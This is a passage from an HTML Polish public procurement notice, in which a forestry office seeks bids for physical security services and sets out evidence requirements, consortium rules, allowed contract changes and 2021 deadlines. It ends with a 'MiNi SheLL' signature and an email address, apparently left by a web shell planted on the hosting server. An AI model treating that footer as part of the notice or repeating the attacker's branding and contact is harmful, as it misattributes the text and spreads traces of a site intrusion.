obowiązków dotyczących płatności podatków i opłat<br/>lokalnych, o których mowa w ustawie z dnia 12 stycznia 1991 r. o podatkach<br/>i opłatach lokalnych, f)<br/>art. 109 ust. 8 i 10 PZP - (wzór oświadczenie Wykonawcy o aktualności<br/>informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 PZP w zakresie podstaw wykluczenia z postępowania stanowi załącznik nr 7 do SWZ).</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełniania warunków udziału w postępowaniu, o których<br/>mowa w pkt 7.1. Zamawiający przed udzieleniem zamówienia, działając na<br/>podstawie art. 274 ust. 1 PZP wezwie Wykonawcę, którego oferta została najwyżej<br/>oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia<br/>wezwania, aktualnych na dzień złożenia, następujących podmiotowych środków<br/>dowodowych:<br/>a) wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia<br/>publicznego, wraz z informacjami na temat ich kwalifikacji zawodowych,<br/>posiadanych uprawnień (jeżeli są wymagane), doświadczenia (jeżeli jest<br/>wymagane) wykształcenia (jeżeli jest wymagane) niezbędnych do wykonania<br/>zamówienia publicznego, a także zakresu wykonywanych przez nie czynności<br/>oraz informacją o podstawie do dysponowania tymi osobami (wzór wykazu<br/>osób skierowanych przez wykonawcę do realizacji zamówienia stanowi<br/>załącznik nr 8 do SWZ),<br/>b) wykaz urządzeń technicznych dostępnych Wykonawcy w celu wykonania<br/>zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi<br/>zasobami (wzór wykazu urządzeń technicznych dostępnych Wykonawcy<br/>w celu wykonania zamówienia stanowi załącznik nr 9 do SWZ).<br/>c) Dokument potwierdzający, że Wykonawca posiada koncesję wydaną<br/>przez MSWiA (wcześniej MSW) na prowadzenie działalności gospodarczej<br/>w zakresie usług ochrony osób i mienia w formie bezpośredniej ochrony<br/>fizycznej w rozumieniu przepisów ustawy z dnia 22 sierpnia 1997 r. o ochronie<br/>osób i mienia (Dz. U. 2021, poz. 1995 z późniejszymi zmianami), zezwolenia,<br/>licencji lub dokumentu potwierdzającego, że Wykonawca jest wpisany<br/>do jednego z rejestrów zawodowych lub handlowych, prowadzonych<br/>w państwie członkowskim Unii Europejskiej, w którym wykonawca ma siedzibę<br/>lub miejsce zamieszkania.<br/>W celu potwierdzenia braku podstaw do wykluczenia z postępowania, o których<br/>mowa w pkt 6.1. i 6.3. oraz w celu potwierdzenia spełniania warunków udziału w<br/>postępowaniu, o których mowa w pkt 7.1. Wykonawca składa wraz z ofertą<br/>oświadczenia, o których mowa w art. 125 ust. 1 PZP, tj. :oświadczenie o spełnianiu warunków udziału, sporządzone zgodnie ze wzorem<br/>stanowiącym załącznik nr 3A do SWZ, oświadczenie o braku podstaw do wykluczenia, sporządzone zgodne ze wzorem<br/>stanowiącym załącznik nr 3B do SWZ.<br/>Oświadczenia, o których mowa wyżej stanowią dowód potwierdzający brak<br/>podstaw wykluczenia oraz spełnienia warunków udziału w postępowaniu, na dzień<br/>składania ofert, tymczasowo zastępujący wymagane przez zamawiającego<br/>podmiotowe środki dowodowe. Oświadczenia te składa się, pod rygorem<br/>nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej<br/>podpisem zaufanym lub podpisem osobistym.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga od Wykonawców przedłożenia przedmiotowych środków<br/>dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> W terminie składania ofert określonym w pkt 14.1. SWZ wykonawca<br/>zobowiązany jest złożyć Zamawiającemu Ofertę zawierającą:<br/>a) formularz Oferty (sporządzony wg wzoru stanowiącego załącznik nr 2<br/>do SWZ) wraz z Kosztorysem ofertowym (sporządzony wg wzoru<br/>stanowiącego załącznik nr 2.1) sporządzony pod rygorem nieważności,<br/>w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem<br/>zaufanym lub podpisem osobistym<br/>b) oświadczenia, sporządzone zgodnie ze wzorami stanowiącymi<br/>odpowiednio załącznik nr 3A i załącznik 3B do SWZ, pod rygorem<br/>nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej<br/>podpisem zaufanym lub podpisem osobistym osoby/osób upoważnionych do<br/>reprezentacji podmiotu składającego oświadczenie, złożone przez:<br/> Wykonawcę,<br/> Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>c) oświadczenia, sporządzone zgodnie ze wzorami stanowiącymi<br/>odpowiednio załącznik nr 3C i załącznik 3D do SWZ, pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej<br/>podpisem zaufanym lub podpisem osobistym osoby/osób upoważnionych do<br/>reprezentacji podmiotu udostępniającego Wykonawcy zasoby na zasadzie<br/>określonej w art. 118 w zw. z art. 266 PZP, o ile dotyczy,<br/>d) zobowiązanie podmiotu udostępniającego zasoby do oddania<br/>Wykonawcy do dyspozycji niezbędnych zasobów na potrzeby realizacji<br/>zamówienia lub inny podmiotowy środek dowodowy potwierdzający,<br/>że Wykonawca realizując zamówienie, będzie dysponował niezbędnymi<br/>zasobami tych podmiotów zgodnie z pkt 9.3. SWZ, jeżeli Wykonawca<br/>wykazując spełnienie warunków udziału w postępowaniu polega na<br/>zdolnościach lub sytuacji innych podmiotów; (Niewiążący wzór zobowiązania<br/>do oddania wykonawcy do dyspozycji niezbędnych zasobów na potrzeby<br/>wykonania zamówienia stanowi załącznik nr 5 do SWZ),<br/>e) odpis lub informacja z Krajowego Rejestru Sądowego, Centralnej<br/>Ewidencji i Informacji o Działalności Gospodarczej lub innego<br/>właściwego rejestru w celu potwierdzenia, że osoba działająca w imieniu<br/>Wykonawcy jest umocowana do jego reprezentowania. Wykonawca nie jest<br/>zobowiązany do złożenia dokumentów, o których mowa w zdaniu<br/>poprzednim, jeżeli Zamawiający może je uzyskać za pomocą bezpłatnych<br/>i ogólnodostępnych baz danych, o ile Wykonawca dostarczy dane<br/>umożliwiające dostęp do tych dokumentów,<br/>f) pełnomocnictwo lub inny dokument potwierdzający umocowanie<br/>do reprezentowania Wykonawcy/podmiotu udostępniającego zasoby<br/>na zasadach określonych w art. 118 PZP, jeżeli w imieniu Wykonawcy/<br/>podmiotu udostępniającego zasoby działa osoba, której umocowanie do jego<br/>reprezentowania nie wynika z innych dokumentów złożonych wraz z ofertą<br/>(np. odpisu lub informacji z Krajowego Rejestru Sądowego, Centralnej<br/>Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego<br/>rejestru), sporządzone pod rygorem nieważności, w postaci elektronicznej<br/>opatrzonej kwalifikowanym podpisem elektronicznym, podpisem zaufanym<br/>lub podpisem osobistym lub w formie opisanej w pkt 9.16.-9.20. SWZ,<br/>g) pełnomocnictwo lub inny dokument potwierdzający umocowanie dla<br/>pełnomocnika ustanowionego przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia do reprezentowania ich w<br/>postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy w<br/>sprawie zamówienia publicznego, jeżeli ofertę składają Wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia, sporządzone pod rygorem<br/>nieważności, w postaci elektronicznej i opatrzonej się kwalifikowanym<br/>podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym lub<br/>w formie opisanej w pkt 9.16 – 9.20. SWZ,<br/>h) oświadczenie, o którym mowa w art. 117 ust. 4 PZP – z którego wynika,<br/>które usługi wykonają poszczególni Wykonawcy, w przypadku wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia (Zamawiający rekomenduje wykorzystać oświadczenie znajdujące się w formularzu<br/>Oferty stanowiącym załącznik nr 2 do SWZ). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku oferty wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia (konsorcjum):<br/>1) w formularzu oferty należy wskazać firmy (nazwy) wszystkich Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia;<br/>2) oferta musi być podpisana w taki sposób, by wiązała prawnie wszystkich<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Osoba<br/>podpisująca ofertę musi posiadać umocowanie prawne do reprezentacji.<br/>Umocowanie musi wynikać z treści pełnomocnictwa załączonego do oferty<br/>– treść pełnomocnictwa powinna dokładnie określać zakres umocowania;<br/>3) Oświadczenia, o których mowa w art. 125 ust. 1 PZP, tj. oświadczenie<br/>o spełnieniu warunków udziału w postępowaniu (wg wzoru stanowiącego<br/>załącznik nr 3A do SWZ) oraz oświadczenie o braku podstaw do<br/>wykluczenia (wg wzoru stanowiącego załącznik nr 3B do SWZ) składa<br/>każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw<br/>wykluczenia oraz spełnienie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału<br/>w postępowaniu. Oświadczenia wykonawców wspólnie ubiegających<br/>się o udzielenie zamówienia, o których mowa wyżej powinny zostać<br/>złożone wraz z ofertą pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>4) dokumenty, o których mowa w pkt 9.3. obowiązany będzie złożyć<br/>każdy z wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia.<br/>5) wszyscy Wykonawcy wspólnie ubiegający się o udzielenie zamówienia<br/>będą ponosić odpowiedzialność solidarną za wykonanie umowy;<br/>6) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia wyznaczą<br/>spośród siebie Wykonawcę kierującego (lidera), upoważnionego do<br/>zaciągania zobowiązań, otrzymywania poleceń oraz instrukcji dla i w imieniu<br/>każdego, jak też dla wszystkich partnerów;<br/>7) Zamawiający może w ramach odpowiedzialności solidarnej żądać<br/>wykonania umowy w całości przez lidera lub od wszystkich Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia łącznie lub każdego z<br/>osobna.<br/>8) Zamawiający informuje o treści przepisu art. 117 ust. 3 PZP, zgodnie<br/>z którym w odniesieniu do warunków dotyczących wykształcenia,<br/>kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia mogą polegać<br/>na zdolnościach tych z wykonawców, którzy wykonają usługi do<br/>realizacji których te zdolności są wymagane.<br/>W związku z powyższym Wykonawca jest zobowiązany załączyć do<br/>oferty podmiotowy środek dowodowy w postaci oświadczenia,<br/>z którego wynika, które usługi wykonają poszczególni Wykonawcy.<br/>Wzór stosownego oświadczenia został zawarty<br/>w formularzu OFERTY stanowiącym załącznik nr 2 do SWZ i Zamawiający zaleca złożyć to oświadczenie właśnie na tym formularzu.<br/>Obowiązek złożenia oświadczenia, o którym mowa w art. 117 ust. 4 PZP odnosi się również do wykonawców, prowadzących działalność w formie<br/>spółki cywilnej. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający na podstawie art 455 ust. 1 pkt 1 PZP, przewiduje możliwość dokonania następujących zmian Umowy: <br/>(1)	w zakresie zmiany terminów Terminu Wykonania, stosownie do przypadku: <br/>(b)	o czas działania Siły Wyższej oraz o czas niezbędny do usunięcia jej skutków i następstw,<br/>(c)	w przypadku zmiany powszechnie obowiązujących przepisów prawa, regulujących zasady wykonywania Przedmiotu Umowy o czas niezbędny do dostosowania wykonania Przedmiotu Umowy lub jego części do zmienionego stanu prawnego,<br/>(d)	o czas opóźnienia w wykonaniu przez podmioty zewnętrzne czynności koniecznych do wykonania Przedmiotu Umowy z zastrzeżeniem, że przyczyną opóźnienia nie są działania lub zaniechania Wykonawcy <br/>(e)	o czas, kiedy realizacja Przedmiotu Umowy była niemożliwa oraz następstw tego zdarzenia w przypadku napotkania przez Wykonawcę lub Zamawiającego okoliczności niemożliwych do przewidzenia i niezależnych od nich,<br/>(f)	o czas niezbędny do wykonania czynności wynikających z zaleceń właściwych organów jeżeli wykonywanie Przedmiotu Umowy zostało wstrzymane przez właściwe organy z przyczyn niezależnych od Wykonawcy, co uniemożliwia terminowe zakończenie realizacji Przedmiotu Umowy,<br/>g)	o czas wynikający z konieczności ewentualnej zmiany zakresu Przedmiotu Umowy wprowadzonej na podstawie przepisów PZP umożliwiających dokonanie takiej zmiany, - przy czym każda zmiana może nastąpić tylko o czas niezbędny do wykonania Przedmiotu Umowy lub jego części, nie dłużej jednak niż o okres trwania okoliczności będących podstawą zmiany oraz ich następstw. <br/> (2)	w zakresie zmiany sposobu wykonania Przedmiotu Umowy związanej z koniecznością zrealizowania Przedmiotu Umowy przy zastosowaniu innych rozwiązań technicznych lub technologicznych, w szczególności robót zamiennych, gdy wystąpi co najmniej jedna z okoliczności:<br/>(a)	wystąpi zmiana prawa mająca wpływ na realizację Przedmiotu Umowy, <br/>(b)	w sytuacji, gdyby zastosowanie przewidzianych pierwotnie rozwiązań groziło niewykonaniem lub wadliwym wykonaniem Przedmiotu Umowy, <br/>(c)	jak również w przypadku wystąpienia okoliczności, o których mowa w pkt (1) i (2) powyżej.<br/>- z zastrzeżeniem, że inne rozwiązania będą spełniały wymagania funkcjonalne określone w Dokumentach Zamówienia w stopniu nie mniejszym niż rozwiązania dotychczasowe. W zakresie zmiany Wynagrodzenia, w przypadku, gdy zmiany, o których mowa w pkt (2) będą miały wpływ na koszty wykonania Przedmiotu Umowy przez Wykonawcę. Ustalenie zmienionej kwoty Wynagrodzenia odbywać się będzie w oparciu o: <br/>(a)	w odniesieniu obniżenia Wynagrodzenia w związku z zaniechaniem wykonywania świadczeń wchodzących w skład Przedmiotu Umowy <br/>(b)	w odniesieniu do zwiększenia Wynagrodzenia w następstwie zmiany, o których mowa w pkt (3) <br/>Inicjatorem zmian w Umowie może być każda ze Stron, z tym, że ostateczna decyzja, co do wprowadzenia zmian i ich zakresu należy do Zamawiającego. Wystąpienie którejkolwiek z okoliczności mogących powodować zmianę umowy, nie stanowi bezwzględnego zobowiązania Zamawiającego do dokonania zmian, ani nie może stanowić podstawy do jakichkolwiek roszczeń Wykonawcy do ich dokonania.<br/>Niezależnie od postanowień niniejszego paragrafu, Strony dopuszczają możliwość (i) zmian redakcyjnych Umowy oraz (ii) zmian danych Stron ujawnionych w rejestrach publicznych, nie stanowiących zmiany, o której mowa w art. 455 ust. 1 PZP. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-12-06 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pośrednictwem Pltformy (SMARTPZP) https://portal.smartpzp.pl/nadlesnictworokita</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-12-06 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-01-04</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Pełen i szczegółowy opis warunków zamówienia określa Specyfikacja Warunków Zamówienia (SWZ) dostępna na stronie https://portal.smartpzp.pl/nadlesnictworokita

Creat By MiNi SheLL
Email: jattceo@gmail.com